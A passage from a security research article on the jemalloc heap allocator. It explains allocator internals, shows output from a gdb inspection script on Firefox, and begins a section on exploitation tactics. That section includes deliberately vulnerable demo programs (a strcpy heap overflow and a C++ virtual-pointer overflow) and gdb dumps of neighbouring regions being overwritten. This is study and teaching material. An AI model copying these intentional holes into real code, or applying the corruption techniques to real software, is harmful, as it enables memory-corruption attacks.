      |                                  |    |  |                     |  |
      +----------+                       |    |  |    .-----------.    |  |
                 |                       |    |  |    |   page    |    |  |
                 |                       |    |  |    +-----------+    |  |
                 |                       |    |  |    |  region   |    |  |
                 v                       |    |  |    +-----------+    |  |
    .--------------------------.         |    |  |    |  region   |    |  |
    |       arena_bin_t        |         |    |  |    +-----------+    |  |
    |     bins[0] (size 8)     |         |    |  |    |  region   |    |  |
    |                          |         |    |  |    +-----------+    |  |
    | .----------------------. |         |    |  |        . . .        |  |
    | | arena_run_t *runcur; |-+---------+    |  |    .-----------.    |  |
    | `----------------------' |              |  |    |   page    |    |  |
    `--------------------------'              |  |    +-----------+    |  |
                                              |  |    |  region   |    |  |
                                              |  |    +-----------+    |  |
                                              |  |    |  region   |    |  |
                                              |  |    +-----------+    |  |
                                              |  |    |  region   |    |  |
                                              |  |    +-----------+    |  |
                                              |  |                     |  |
                                              |  `---------------------'  |
                                              `---------------------------'


------[ 2.1.6 - Huge allocations

Huge allocations are not very interesting for the attacker but they are an
integral part of jemalloc which may affect the exploitation process. Simply
put, huge allocations are represented by 'extent_node_t' structures that 
are ordered in a global red black tree which is common to all threads.


[2-7]

/* Tree of extents. */
typedef struct extent_node_s extent_node_t;
struct extent_node_s {
    #ifdef MALLOC_DSS
        /* Linkage for the size/address-ordered tree. */
        rb_node(extent_node_t) link_szad;
    #endif

    /* Linkage for the address-ordered tree. */
    rb_node(extent_node_t) link_ad;

    /* Pointer to the extent that this tree node is responsible for. */
    void *addr;

    /* Total region size. */
    size_t size;
};
typedef rb_tree(extent_node_t) extent_tree_t;


The 'extent_node_t' structures are allocated in small memory regions
called base nodes. Base nodes do not affect the layout of end user heap
allocations since they are served either by the DSS or by individual
memory mappings acquired by 'mmap()'. The actual method used to allocate
free space depends on how jemalloc was compiled with 'mmap()' being
the default.


/* Allocate an extent node with which to track the chunk. */
node = base_node_alloc();
...

ret = chunk_alloc(csize, zero);
...

/* Insert node into huge. */
node->addr = ret;
node->size = csize;
...

malloc_mutex_lock(&huge_mtx);
extent_tree_ad_insert(&huge, node);


The most interesting thing about huge allocations is the fact that free
base nodes are kept in a simple array of pointers called 'base_nodes'. The
aforementioned array, although defined as a simple pointer, it's handled
as if it was a two dimensional array holding pointers to available base
nodes.


static extent_node_t *base_nodes;
...

static extent_node_t *
base_node_alloc(void)
{
    extent_node_t *ret;

    malloc_mutex_lock(&base_mtx);
    if (base_nodes != NULL) {
        ret = base_nodes;
        base_nodes = *(extent_node_t **)ret;
        ...
    }
    ...
}

static void
base_node_dealloc(extent_node_t *node)
{
    malloc_mutex_lock(&base_mtx);
    *(extent_node_t **)node = base_nodes;
    base_nodes = node;
    ...
}


Taking into account how 'base_node_alloc()' works, it's obvious that if
an attacker corrupts the pages that contain the base node pointers, she
can force jemalloc to use an arbitrary address as a base node pointer. This
itself can lead to interesting scenarios but they are out of the scope
of this article since the chances of achieving something like this are
quite low. Nevertheless, a quick review of the code reveals that one
may be able to achieve this goal by forcing huge allocations once she
controls the physically last region of an arena. The attack is possible
if and only if the mappings that will hold the base pointers are allocated
right after the attacker controlled region.

A careful reader would have noticed that if an attacker manages to pass
a controlled value as the first argument to 'base_node_dealloc()' she
can get a '4bytes anywhere' result. Unfortunately, as far as the authors
can see, this is possible only if the global red black tree holding the
huge allocations is corrupted. This situation is far more difficult to
achieve than the one described in the previous paragraph. Nevertheless,
we would really like to hear from anyone that manages to do so.


------[ 2.1.7 - Thread caches (tcache_t)

In the previous paragraphs we mentioned how jemalloc allocates new arenas
at will in order to avoid lock contention. In this section we will focus on
the mechanisms that are activated on multicore systems and multithreaded
programs.

Let's set the following straight:

1) A multicore system is the reason jemalloc allocates more than one arena.
On a unicore system there's only one available arena, even on multithreaded
applications. However, the Firefox jemalloc variant has just one arena
hardcoded, therefore it has no thread caches.

2) On a multicore system, even if the target application runs on a single
thread, more than one arenas are used.

No matter what the number of cores on the system is, a multithreaded
application utilizing jemalloc will make use of the so called 'magazines'
(also called 'tcaches' on newer versions of jemalloc). Magazines (tcaches)
are thread local structures used to avoid thread blocking problems.
Whenever a thread wishes to allocate a memory region, jemalloc will use
those thread specific data structures instead of following the normal code
path.


void *
arena_malloc(arena_t *arena, size_t size, bool zero)
{
    ...

    if (size <= bin_maxclass) {
#ifdef MALLOC_MAG
        if (__isthreaded && opt_mag) {
            mag_rack_t *rack = mag_rack;
            if (rack == NULL) {
                rack = mag_rack_create(arena);
                ...

                return (mag_rack_alloc(rack, size, zero));
            }
            else
#endif
                return (arena_malloc_small(arena, size, zero));
        }
        ...
}


The 'opt_mag' variable is true by default. The variable '__isthreaded' is
exported by 'libthr', the pthread implementation for FreeBSD and is set to
1 on a call to 'pthread_create()'. Obviously, the rest of the details are
out of the scope of this article.

In this section we will analyze thread magazines, but the exact same
principles apply on the tcaches (the change in the nomenclature is probably
the most notable difference between them).

The behavior of thread magazines is affected by the following macros that
are _defined_:

  MALLOC_MAG - Make use of thread magazines.

  MALLOC_BALANCE - Balance arena usage using a simple linear random number
  generator (have a look at 'choose_arena()').

The following constants are _undefined_:

  NO_TLS - TLS _is_ available on __i386__

Furthermore, 'opt_mag', the jemalloc runtime option controlling thread
magazine usage, is, as we mentioned earlier, enabled by default.

The following figure depicts the relationship between the various thread
magazines' structures.


.-------------------------------------------.
|                mag_rack_t                 |
|                                           |
|           bin_mags_t bin_mags[];          |
|                                           |
|  .-------------------------------------.  |
|  | bin_mags[0] ... bin_mags[nbins - 1] |  |
|  `-------------------------------------'  |
`--------|----------------------------------'
         |
         |                                   .------------------.
         |                      +----------->|      mag_t       |
         v                      |            |                  |
.----------------------.        |            |  void *rounds[]  |
|      bin_mags_t      |        |            |       ...        |
|                      |        |            `------------------'
|  .----------------.  |        |
|  | mag_t *curmag; |-----------+
|  `----------------'  |
|         ...          |
`----------------------'


The core of the aforementioned thread local metadata is the 'mag_rack_t'. A
'mag_rack_t' is a simplified equivalent of an arena. It is composed of a
single array of 'bin_mags_t' structures. Each thread in a program is
associated with a private 'mag_rack_t' which has a lifetime equal to the
application's.


typedef struct mag_rack_s mag_rack_t;
struct mag_rack_s {
    bin_mags_t bin_mags[1]; /* Dynamically sized. */
};


Bins belonging to magazine racks are represented by 'bin_mags_t' structures
(notice the plural form).


/*
 * Magazines are lazily allocated, but once created, they remain until the
 * associated mag_rack is destroyed.
 */
typedef struct bin_mags_s bin_mags_t;
struct bin_mags_s {
    mag_t *curmag;
    mag_t *sparemag;
};

typedef struct mag_s mag_t;
struct mag_s {
    size_t binind; /* Index of associated bin. */
    size_t nrounds;
    void *rounds[1]; /* Dynamically sized. */
};


Just like a normal bin is associated with a run, a 'bin_mags_t' structure
is associated with a magazine pointed by 'curmag' (recall 'runcur'). A
magazine is nothing special but a simple array of void pointers which hold
memory addresses of preallocated memory regions which are exclusively used
by a single thread. Magazines are populated in function 'mag_load()' as
seen below.


void
mag_load(mag_t *mag)
{
    arena_t *arena;
    arena_bin_t *bin;
    arena_run_t *run;
    void *round;
    size_t i;

    /* Pick a random arena and the bin responsible for servicing
     * the required size class.
     */
    arena = choose_arena();
    bin = &arena->bins[mag->binind];
    ...

    for (i = mag->nrounds; i < max_rounds; i++) {
        ...

        if ((run = bin->runcur) != NULL && run->nfree > 0)
            round = arena_bin_malloc_easy(arena, bin, run); /* [3-23] */
        else
            round = arena_bin_malloc_hard(arena, bin); /* [3-24] */

        if (round == NULL)
            break;

        /* Each 'rounds' holds a preallocated memory region. */
        mag->rounds[i] = round;
    }

    ...
    mag->nrounds = i;
}


When a thread calls 'malloc()', the call chain eventually reaches
'mag_rack_alloc()' and then 'mag_alloc()'.


/* Just return the next available void pointer. It points to one of the
 * preallocated memory regions.
 */
void *
mag_alloc(mag_t *mag)
{
    if (mag->nrounds == 0)
        return (NULL);
    mag->nrounds--;

    return (mag->rounds[mag->nrounds]);
}


The most notable thing about magazines is the fact that 'rounds', the array
of void pointers, as well as all the related thread metadata (magazine
racks, magazine bins and so on) are allocated by normal calls to functions
'arena_bin_malloc_xxx()' ([3-23], [3-24]). This results in the thread
metadata lying around normal memory regions.


------[ 2.1.8 - Unmask jemalloc

As we are sure you are all aware, since version 7.0, gdb can be scripted
with Python. In order to unmask and bring to light the internals of the
various jemalloc flavors, we have developed a Python script for gdb
appropriately named unmask_jemalloc.py.  The following is a sample run of
the script on Firefox 11.0 on Linux x86 (edited for readability):


$ ./firefox-bin &

$ gdb -x ./gdbinit -p `ps x | grep firefox | grep -v grep \
| grep -v debug | awk '{print $1}'`

GNU gdb (GDB) 7.4-debian
...
Attaching to process 3493
add symbol table from file "/dbg/firefox-latest-symbols/firefox-bin.dbg" at
    .text_addr = 0x80494b0
add symbol table from file "/dbg/firefox-latest-symbols/libxul.so.dbg" at
    .text_addr = 0xb5b9a9d0
...
[Thread 0xa4ffdb70 (LWP 3533) exited]
[Thread 0xa57feb70 (LWP 3537) exited]
[New Thread 0xa57feb70 (LWP 3556)]
[Thread 0xa57feb70 (LWP 3556) exited]

gdb $ source unmask_jemalloc.py
gdb $ unmask_jemalloc runs

[jemalloc] [number of arenas:       1]
[jemalloc] [number of bins:         24]
[jemalloc] [no magazines/thread caches detected]

[jemalloc] [arena #00] [bin #00] [region size: 0x0004]
                                            [current run at: 0xa52d9000]
[jemalloc] [arena #00] [bin #01] [region size: 0x0008]
                                            [current run at: 0xa37c8000]
[jemalloc] [arena #00] [bin #02] [region size: 0x0010]
                                            [current run at: 0xa372c000]
[jemalloc] [arena #00] [bin #03] [region size: 0x0020]
                                            [current run at: 0xa334d000]
[jemalloc] [arena #00] [bin #04] [region size: 0x0030]
                                            [current run at: 0xa3347000]
[jemalloc] [arena #00] [bin #05] [region size: 0x0040]
                                            [current run at: 0xa334a000]
[jemalloc] [arena #00] [bin #06] [region size: 0x0050]
                                            [current run at: 0xa3732000]
[jemalloc] [arena #00] [bin #07] [region size: 0x0060]
                                            [current run at: 0xa3701000]
[jemalloc] [arena #00] [bin #08] [region size: 0x0070]
                                            [current run at: 0xa3810000]
[jemalloc] [arena #00] [bin #09] [region size: 0x0080]
                                            [current run at: 0xa3321000]
[jemalloc] [arena #00] [bin #10] [region size: 0x00f0]
                                            [current run at: 0xa57c7000]
[jemalloc] [arena #00] [bin #11] [region size: 0x0100]
                                            [current run at: 0xa37e9000]
[jemalloc] [arena #00] [bin #12] [region size: 0x0110]
                                            [current run at: 0xa5a9b000]
[jemalloc] [arena #00] [bin #13] [region size: 0x0120]
                                            [current run at: 0xa56ea000]
[jemalloc] [arena #00] [bin #14] [region size: 0x0130]
                                            [current run at: 0xa3709000]
[jemalloc] [arena #00] [bin #15] [region size: 0x0140]
                                            [current run at: 0xa382c000]
[jemalloc] [arena #00] [bin #16] [region size: 0x0150]
                                            [current run at: 0xa39da000]
[jemalloc] [arena #00] [bin #17] [region size: 0x0160]
                                            [current run at: 0xa56ee000]
[jemalloc] [arena #00] [bin #18] [region size: 0x0170]
                                            [current run at: 0xa3849000]
[jemalloc] [arena #00] [bin #19] [region size: 0x0180]
                                            [current run at: 0xa3a21000]
[jemalloc] [arena #00] [bin #20] [region size: 0x01f0]
                                            [current run at: 0xafc51000]
[jemalloc] [arena #00] [bin #21] [region size: 0x0200]
                                            [current run at: 0xa3751000]
[jemalloc] [arena #00] [bin #22] [region size: 0x0400]
                                            [current run at: 0xa371d000]
[jemalloc] [arena #00] [bin #23] [region size: 0x0800]
                                            [current run at: 0xa370d000]

[jemalloc] [run 0xa3347000] [from 0xa3347000 to 0xa3348000L] 
[jemalloc] [run 0xa371d000] [from 0xa371d000 to 0xa3725000L] 
[jemalloc] [run 0xa3321000] [from 0xa3321000 to 0xa3323000L] 
[jemalloc] [run 0xa334a000] [from 0xa334a000 to 0xa334b000L] 
[jemalloc] [run 0xa370d000] [from 0xa370d000 to 0xa3715000L] 
[jemalloc] [run 0xa3709000] [from 0xa3709000 to 0xa370d000L] 
[jemalloc] [run 0xa37c8000] [from 0xa37c8000 to 0xa37c9000L] 
[jemalloc] [run 0xa5a9b000] [from 0xa5a9b000 to 0xa5a9f000L] 
[jemalloc] [run 0xa3a21000] [from 0xa3a21000 to 0xa3a27000L] 
[jemalloc] [run 0xa382c000] [from 0xa382c000 to 0xa3831000L] 
[jemalloc] [run 0xa3701000] [from 0xa3701000 to 0xa3702000L] 
[jemalloc] [run 0xa57c7000] [from 0xa57c7000 to 0xa57ca000L] 
[jemalloc] [run 0xa56ee000] [from 0xa56ee000 to 0xa56f3000L] 
[jemalloc] [run 0xa39da000] [from 0xa39da000 to 0xa39df000L] 
[jemalloc] [run 0xa37e9000] [from 0xa37e9000 to 0xa37ed000L] 
[jemalloc] [run 0xa3810000] [from 0xa3810000 to 0xa3812000L] 
[jemalloc] [run 0xa3751000] [from 0xa3751000 to 0xa3759000L] 
[jemalloc] [run 0xafc51000] [from 0xafc51000 to 0xafc58000L] 
[jemalloc] [run 0xa334d000] [from 0xa334d000 to 0xa334e000L] 
[jemalloc] [run 0xa372c000] [from 0xa372c000 to 0xa372d000L] 
[jemalloc] [run 0xa52d9000] [from 0xa52d9000 to 0xa52da000L] 
[jemalloc] [run 0xa56ea000] [from 0xa56ea000 to 0xa56ee000L] 
[jemalloc] [run 0xa3732000] [from 0xa3732000 to 0xa3733000L] 
[jemalloc] [run 0xa3849000] [from 0xa3849000 to 0xa384e000L] 


There is also preliminary support for Mac OS X (x86_64), tested on Lion
10.7.3 with Firefox 11.0. Also, note that Apple's gdb does not have Python
scripting support, so the following was obtained with a custom-compiled
gdb:


$ open firefox-11.0.app

$ gdb -nx -x ./gdbinit -p 837

...
Attaching to process 837
[New Thread 0x2003 of process 837]
[New Thread 0x2103 of process 837]
[New Thread 0x2203 of process 837]
[New Thread 0x2303 of process 837]
[New Thread 0x2403 of process 837]
[New Thread 0x2503 of process 837]
[New Thread 0x2603 of process 837]
[New Thread 0x2703 of process 837]
[New Thread 0x2803 of process 837]
[New Thread 0x2903 of process 837]
[New Thread 0x2a03 of process 837]
[New Thread 0x2b03 of process 837]
[New Thread 0x2c03 of process 837]
[New Thread 0x2d03 of process 837]
[New Thread 0x2e03 of process 837]
Reading symbols from
/dbg/firefox-11.0.app/Contents/MacOS/firefox...done
Reading symbols from
/dbg/firefox-11.0.app/Contents/MacOS/firefox.dSYM/
Contents/Resources/DWARF/firefox...done.
0x00007fff8636b67a in ?? () from /usr/lib/system/libsystem_kernel.dylib
(gdb) source unmask_jemalloc.py
(gdb) unmask_jemalloc

[jemalloc] [number of arenas:       1]
[jemalloc] [number of bins:         35]
[jemalloc] [no magazines/thread caches detected]

[jemalloc] [arena #00] [bin #00] [region size: 0x0008]
                                            [current run at: 0x108fe0000]
[jemalloc] [arena #00] [bin #01] [region size: 0x0010]
                                            [current run at: 0x1003f5000]
[jemalloc] [arena #00] [bin #02] [region size: 0x0020]
                                            [current run at: 0x1003bc000]
[jemalloc] [arena #00] [bin #03] [region size: 0x0030]
                                            [current run at: 0x1003d7000]
[jemalloc] [arena #00] [bin #04] [region size: 0x0040]
                                            [current run at: 0x1054c6000]
[jemalloc] [arena #00] [bin #05] [region size: 0x0050]
                                            [current run at: 0x103652000]
[jemalloc] [arena #00] [bin #06] [region size: 0x0060]
                                            [current run at: 0x110c9c000]
[jemalloc] [arena #00] [bin #07] [region size: 0x0070]
                                            [current run at: 0x106bef000]
[jemalloc] [arena #00] [bin #08] [region size: 0x0080]
                                            [current run at: 0x10693b000]
[jemalloc] [arena #00] [bin #09] [region size: 0x0090]
                                            [current run at: 0x10692e000]
[jemalloc] [arena #00] [bin #10] [region size: 0x00a0]
                                            [current run at: 0x106743000]
[jemalloc] [arena #00] [bin #11] [region size: 0x00b0]
                                            [current run at: 0x109525000]
[jemalloc] [arena #00] [bin #12] [region size: 0x00c0]
                                            [current run at: 0x1127c2000]
[jemalloc] [arena #00] [bin #13] [region size: 0x00d0]
                                            [current run at: 0x106797000]
[jemalloc] [arena #00] [bin #14] [region size: 0x00e0]
                                            [current run at: 0x109296000]
[jemalloc] [arena #00] [bin #15] [region size: 0x00f0]
                                            [current run at: 0x110aa9000]
[jemalloc] [arena #00] [bin #16] [region size: 0x0100]
                                            [current run at: 0x106c70000]
[jemalloc] [arena #00] [bin #17] [region size: 0x0110]
                                            [current run at: 0x109556000]
[jemalloc] [arena #00] [bin #18] [region size: 0x0120]
                                            [current run at: 0x1092bf000]
[jemalloc] [arena #00] [bin #19] [region size: 0x0130]
                                            [current run at: 0x1092a2000]
[jemalloc] [arena #00] [bin #20] [region size: 0x0140]
                                            [current run at: 0x10036a000]
[jemalloc] [arena #00] [bin #21] [region size: 0x0150]
                                            [current run at: 0x100353000]
[jemalloc] [arena #00] [bin #22] [region size: 0x0160]
                                            [current run at: 0x1093d3000]
[jemalloc] [arena #00] [bin #23] [region size: 0x0170]
                                            [current run at: 0x10f024000]
[jemalloc] [arena #00] [bin #24] [region size: 0x0180]
                                            [current run at: 0x106b58000]
[jemalloc] [arena #00] [bin #25] [region size: 0x0190]
                                            [current run at: 0x10f002000]
[jemalloc] [arena #00] [bin #26] [region size: 0x01a0]
                                            [current run at: 0x10f071000]
[jemalloc] [arena #00] [bin #27] [region size: 0x01b0]
                                            [current run at: 0x109139000]
[jemalloc] [arena #00] [bin #28] [region size: 0x01c0]
                                            [current run at: 0x1091c6000]
[jemalloc] [arena #00] [bin #29] [region size: 0x01d0]
                                            [current run at: 0x10032a000]
[jemalloc] [arena #00] [bin #30] [region size: 0x01e0]
                                            [current run at: 0x1054f9000]
[jemalloc] [arena #00] [bin #31] [region size: 0x01f0]
                                            [current run at: 0x10034c000]
[jemalloc] [arena #00] [bin #32] [region size: 0x0200]
                                            [current run at: 0x106739000]
[jemalloc] [arena #00] [bin #33] [region size: 0x0400]
                                            [current run at: 0x106c68000]
[jemalloc] [arena #00] [bin #34] [region size: 0x0800]
                                            [current run at: 0x10367e000]


We did our best to test unmask_jemalloc.py on all jemalloc variants,
however there are probably some bugs left. Feel free to test it and send us
patches. The development of unmask_jemalloc.py will continue at [UJEM].


----[ 2.2 - Algorithms

In this section we present pseudocode the describes the allocation and
deallocation algorithms implemented by jemalloc. We start with malloc():


MALLOC(size):
    IF size CAN BE SERVICED BY AN ARENA:
        IF size IS SMALL OR MEDIUM:
            bin = get_bin_for_size(size)

            IF bin->runcur EXISTS AND NOT FULL:
                run = bin->runcur
            ELSE:
                run = lookup_or_allocate_nonfull_run()
                bin->runcur = run

            bit = get_first_set_bit(run->regs_mask)
            region = get_region(run, bit)

        ELIF size IS LARGE:
            region = allocate_new_run()
    ELSE:
        region = allocate_new_chunk()
    RETURN region


calloc() is as you would expect:


CALLOC(n, size):
    RETURN MALLOC(n * size)


Finally, the pseudocode for free():


FREE(addr):
    IF addr IS NOT EQUAL TO THE CHUNK IT BELONGS:
        IF addr IS A SMALL ALLOCATION:
            run = get_run_addr_belongs_to(addr);
            bin = run->bin;
            size = bin->reg_size;
            element = get_element_index(addr, run, bin)
            unset_bit(run->regs_mask[element])

        ELSE: /* addr is a large allocation */
            run = get_run_addr_belongs_to(addr)
            chunk = get_chunk_run_belongs_to(run)
            run_index = get_run_index(run, chunk)
            mark_pages_of_run_as_free(run_index)

            IF ALL THE PAGES OF chunk ARE MARKED AS FREE:
                unmap_the_chunk_s_pages(chunk)

    ELSE: /* this is a huge allocation */
        unmap_the_huge_allocation_s_pages(addr)


--[ 3 - Exploitation tactics

In this section we analyze the exploitation tactics we have investigated
against jemalloc. Our goal is to provide to the interested hackers the
necessary knowledge and tools to develop exploits for jemalloc heap
corruption bugs.

We also try to approach jemalloc heap exploitation in an abstract way
initially, identifying 'exploitation primitives' and then continuing into
the specific required technical details. Chris Valasek and Ryan Smith have
explored the value of abstracting heap exploitation through primitives
[CVRS]. The main idea is that specific exploitation techniques eventually
become obsolete. Therefore it is important to approach exploitation
abstractly and identify primitives that can applied to new targets. We have
used this approach before, comparing FreeBSD and Linux kernel heap
exploitation [HAPF, APHN]. Regarding jemalloc, we analyze adjacent data
corruption, heap manipulation and metadata corruption exploitation
primitives.


----[ 3.1 - Adjacent region corruption

The main idea behind adjacent heap item corruptions is that you exploit the
fact that the heap manager places user allocations next to each other
contiguously without other data in between. In jemalloc regions of the same
size class are placed on the same bin. In the case that they are also
placed on the same run of the bin then there are no inline metadata between
them. In 3.2 we will see how we can force this, but for now let's assume
that new allocations of the same size class are placed in the same run.

Therefore, we can place a victim object/structure of our choosing in the
same run and next to the vulnerable object/structure we plan to overflow.
The only requirement is that the victim and vulnerable objects need to be
of a size that puts them in the same size class and therefore possibly in
the same run (again, see the next subsection on how to control this). Since
there are no metadata between the two regions, we can overflow from the
vulnerable region to the victim region we have chosen. Usually the victim
region is something that can help us achieve arbitrary code execution, for
example function pointers.

In the following contrived example consider that 'three' is your chosen
victim object and that the vulnerable object is 'two' (full code in file
test-adjacent.c):


char *one, *two, *three;

printf("[*] before overflowing\n");

one = malloc(0x10);
memset(one, 0x41, 0x10);
printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one);

two = malloc(0x10);
memset(two, 0x42, 0x10);
printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two);

three = malloc(0x10);
memset(three, 0x43, 0x10);
printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three);

[3-1]

printf("[+] copying argv[1] to region two\n");
strcpy(two, argv[1]);

printf("[*] after overflowing\n");
printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one);
printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two);
printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three);

[3-2]

free(one);
free(two);
free(three);

printf("[*] after freeing all regions\n");
printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one);
printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two);
printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three);

[3-3]


The output (edited for readability):


$ ./test-adjacent `python -c 'print "X" * 30'`
[*] before overflowing
[+] region one:   0xb7003030: AAAAAAAAAAAAAAAA
[+] region two:   0xb7003040: BBBBBBBBBBBBBBBB
[+] region three: 0xb7003050: CCCCCCCCCCCCCCCC
[+] copying argv[1] to region two
[*] after overflowing
[+] region one:   0xb7003030: 
AAAAAAAAAAAAAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[+] region two:   0xb7003040: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[+] region three: 0xb7003050: XXXXXXXXXXXXXX
[*] after freeing all regions
[+] region one:   0xb7003030: 
AAAAAAAAAAAAAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[+] region two:   0xb7003040: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[+] region three: 0xb7003050: XXXXXXXXXXXXXX


Examining the above we can see that region 'one' is at 0xb7003030 and that
the following two allocations (regions 'two' and 'three') are in the same
run immediately after 'one' and all three next to each other without any
metadata in between them. After the overflow of 'two' with 30 'X's we can
see that region 'three' has been overwritten with 14 'X's (30 - 16 for the
size of region 'two').

In order to achieve a better understanding of the jemalloc memory layout
let's fire up gdb with three breakpoints at [3-1], [3-2] and [3-3].

At breakpoint [3-1]:


Breakpoint 1, 0x080486a9 in main ()
gdb $ print arenas[0].bins[2].runcur
$1 = (arena_run_t *) 0xb7003000


At 0xb7003000 is the current run of the bin bins[2] that manages the size
class 16 in the standalone jemalloc flavor that we have linked against.
Let's take a look at the run's contents:


gdb $ x/40x 0xb7003000
0xb7003000: 0xb78007ec  0x00000003  0x000000fa  0xfffffff8
0xb7003010: 0xffffffff  0xffffffff  0xffffffff  0xffffffff
0xb7003020: 0xffffffff  0xffffffff  0x1fffffff  0x000000ff
0xb7003030: 0x41414141  0x41414141  0x41414141  0x41414141
0xb7003040: 0x42424242  0x42424242  0x42424242  0x42424242
0xb7003050: 0x43434343  0x43434343  0x43434343  0x43434343
0xb7003060: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7003070: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7003080: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7003090: 0x00000000  0x00000000  0x00000000  0x00000000


After some initial metadata (the run's header which we will see in more
detail at 3.3.1) we have region 'one' at 0xb7003030 followed by regions
'two' and 'three', all of size 16 bytes. Again we can see that there are no
metadata between the regions. Continuing to breakpoint [3-2] and examining
again the contents of the run:


Breakpoint 2, 0x08048724 in main ()
gdb $ x/40x 0xb7003000
0xb7003000: 0xb78007ec  0x00000003  0x000000fa  0xfffffff8
0xb7003010: 0xffffffff  0xffffffff  0xffffffff  0xffffffff
0xb7003020: 0xffffffff  0xffffffff  0x1fffffff  0x000000ff
0xb7003030: 0x41414141  0x41414141  0x41414141  0x41414141
0xb7003040: 0x58585858  0x58585858  0x58585858  0x58585858
0xb7003050: 0x58585858  0x58585858  0x58585858  0x43005858
0xb7003060: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7003070: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7003080: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7003090: 0x00000000  0x00000000  0x00000000  0x00000000


We can see that our 30 'X's (0x58) have overwritten the complete 16 bytes
of region 'two' at 0xb7003040 and continued for 15 bytes (14 plus a NULL
from strcpy(3)) in region 'three' at 0xb7003050. From this memory dump it
should be clear why the printf(3) call of region 'one' after the overflow
continues to print all 46 bytes (16 from region 'one' plus 30 from the
overflow) up to the NULL placed by the strcpy(3) call. As it has been
demonstrated by Peter Vreugdenhil in the context of Internet Explorer heap
overflows [PV10], this can lead to information leaks from the region that
is adjacent to the region with the string whose terminating NULL has been
overwritten. You just need to read back the string and you will get all
data up to the first encountered NULL.

At breakpoint [3-3] after the deallocation of all three regions:


Breakpoint 3, 0x080487ab in main ()
gdb $ x/40x 0xb7003000
0xb7003000: 0xb78007ec  0x00000003  0x000000fd  0xffffffff
0xb7003010: 0xffffffff  0xffffffff  0xffffffff  0xffffffff
0xb7003020: 0xffffffff  0xffffffff  0x1fffffff  0x000000ff
0xb7003030: 0x41414141  0x41414141  0x41414141  0x41414141
0xb7003040: 0x58585858  0x58585858  0x58585858  0x58585858
0xb7003050: 0x58585858  0x58585858  0x58585858  0x43005858
0xb7003060: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7003070: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7003080: 0x00000000  0x00000000  0x00000000  0x00000000
0xb7003090: 0x00000000  0x00000000  0x00000000  0x00000000


We can see that jemalloc does not clear the freed regions. This behavior of
leaving stale data in regions that have been freed and can be allocated
again can lead to easier exploitation of use-after-free bugs (see next
section).

To explore the adjacent region corruption primitive further in the context
of jemalloc, we will now look at C++ and virtual function pointers (VPTRs).
We will only focus on jemalloc-related details; for more general
information the interested reader should see rix's Phrack paper (the
principles of which are still applicable) [VPTR]. We begin with a C++
example that is based on rix's bo2.cpp (file vuln-vptr.cpp in the code
archive):


class base
{
    private:

        char buf[32];

    public:

        void
        copy(const char *str)
        {
            strcpy(buf, str);
        }
        
        virtual void
        print(void)
        {
            printf("buf: 0x%08x: %s\n", buf, buf);
        }
};

class derived_a : public base
{
    public:

        void
        print(void)
        {
            printf("[+] derived_a: ");
            base::print();
        }
};

class derived_b : public base
{
    public:

        void
        print(void)
        {
            printf("[+] derived_b: ");
            base::print();
        }
};

int
main(int argc, char *argv[])
{
    base *obj_a;
    base *obj_b;

    obj_a = new derived_a;
    obj_b = new derived_b;

    printf("[+] obj_a:\t0x%x\n", (unsigned int)obj_a);
    printf("[+] obj_b:\t0x%x\n", (unsigned int)obj_b);

    if(argc == 3)
    {
        printf("[+] overflowing from obj_a into obj_b\n");
        obj_a->copy(argv[1]);

        obj_b->copy(argv[2]);

        obj_a->print();
        obj_b->print();

        return 0;
    }


We have a base class with a virtual function, 'print(void)', and two
derived classes that overload this virtual function. Then in main, we use
'new' to create two new objects, one from each of the derived classes.
Subsequently we overflow the 'buf' buffer of 'obj_a' with 'argv[1]'.

Let's explore with gdb:


$ gdb vuln-vptr
...
gdb $ r `python -c 'print "A" * 48'` `python -c 'print "B" * 10'`
...
0x804862f <main(int, char**)+15>:    movl   $0x24,(%esp)
0x8048636 <main(int, char**)+22>:    call   0x80485fc <_Znwj@plt>
0x804863b <main(int, char**)+27>:    movl   $0x80489e0,(%eax)
gdb $ print $eax
$13 = 0xb7c01040


At 0x8048636 we can see the first 'new' call which takes as a parameter the
size of the object to create, that is 0x24 or 36 bytes. C++ will of course
use jemalloc to allocate the required amount of memory for this new object.
After the call instruction, EAX has the address of the allocated region
(0xb7c01040) and at 0x804863b the value 0x80489e0 is moved there. This is
the VPTR that points to 'print(void)' of 'obj_a':


gdb $ x/x *0x080489e0
0x80487d0 <derived_a::print()>: 0xc71cec83


Now it must be clear why even though the declared buffer is 32 bytes long,
there are 36 bytes allocated for the object. Exactly the same as above
happens with the second 'new' call, but this time the VPTR points to
'obj_b' (which is at 0xb7c01070):


0x8048643 <main(int, char**)+35>:    movl   $0x24,(%esp)
0x804864a <main(int, char**)+42>:    call   0x80485fc <_Znwj@plt>
0x804864f <main(int, char**)+47>:    movl   $0x80489f0,(%eax)
gdb $ x/x *0x080489f0
0x8048800 <derived_b::print()>: 0xc71cec83
gdb $ print $eax
$14 = 0xb7c01070


At this point, let's explore jemalloc's internals:


gdb $ print arenas[0].bins[5].runcur
$8 = (arena_run_t *) 0xb7c01000
gdb $ print arenas[0].bins[5].reg_size
$9 = 0x30
gdb $ print arenas[0].bins[4].reg_size
$10 = 0x20
gdb $ x/40x 0xb7c01000
0xb7c01000: 0xb7fd315c  0x00000000  0x00000052  0xfffffffc
0xb7c01010: 0xffffffff  0x000fffff  0x00000000  0x00000000
0xb7c01020: 0x00000000  0x00000000  0x00000000  0x00000000
